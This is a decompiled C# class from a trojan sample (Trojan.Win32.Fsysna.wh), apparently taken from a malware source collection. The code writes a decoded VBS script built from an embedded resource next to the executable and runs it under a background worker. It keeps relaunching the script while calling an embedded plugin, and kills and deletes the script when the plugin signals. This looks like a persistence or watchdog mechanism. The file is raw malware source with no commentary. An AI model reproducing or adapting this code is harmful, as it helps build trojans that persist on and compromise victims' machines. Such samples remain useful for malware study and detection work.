MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.wh-0adec5f2e37dcb28180512f882c1aec3a7f939bf33e4147587c7b7277719444b/A.cs

// Decompiled with JetBrains decompiler
// Type: n.A
// Assembly: n, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BFCF94BC-F711-4A63-941E-52FC7F306AC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Fsysna.wh-0adec5f2e37dcb28180512f882c1aec3a7f939bf33e4147587c7b7277719444b.exe

using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;

namespace n
{
  public class A
  {
    [AccessedThroughProperty("B")]
    private BackgroundWorker _B;
    public static Process fj = new Process();
    private string u;
    private string z;

    public A()
    {
      this.B = new BackgroundWorker();
      this.u = Application.StartupPath + "\\" + Process.GetCurrentProcess().Id.ToString() + ".vbs";
      string q = n.My.Resources.Resources.Q;
      this.z = API.DEB(ref q).Replace("NJP", Application.ExecutablePath).Replace("NJF", Conversions.ToString(Process.GetCurrentProcess().Id));
    }

    public virtual BackgroundWorker B
    {
      get => this._B;
      [MethodImpl(MethodImplOptions.Synchronized)] set
      {
        DoWorkEventHandler workEventHandler = (DoWorkEventHandler) ((a0, a1) => this.D());
        if (this._B != null)
          this._B.DoWork -= workEventHandler;
        this._B = value;
        if (this._B == null)
          return;
        this._B.DoWork += workEventHandler;
      }
    }

    public void D()
    {
label_0:
      try
      {
        File.WriteAllText(this.u, this.z);
        A.fj.StartInfo.FileName = this.u;
        A.fj.Start();
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
      do
      {
        try
        {
          ref byte[] local1 = ref C.Plug;
          string str1 = "plugin.C";
          ref string local2 = ref str1;
          string str2 = "Fwd";
          ref string local3 = ref str2;
          object obj = (object) new object[1]
          {
            (object) "Windows Script Host"
          };
          ref object local4 = ref obj;
          if (Operators.ConditionalCompareObjectGreater(C.inv(ref local1, ref local2, ref local3, ref local4), (object) 0, false))
          {
            A.fj.Kill();
            try
            {
              File.Delete(this.u);
              return;
            }
            catch (Exception ex)
            {
              ProjectData.SetProjectError(ex);
              ProjectData.ClearProjectError();
              return;
            }
          }
        }
        catch (Exception ex)
        {
          ProjectData.SetProjectError(ex);
          ProjectData.ClearProjectError();
        }
        Thread.Sleep(100);
      }
      while (!A.fj.WaitForExit(100));
      goto label_0;
    }
  }
}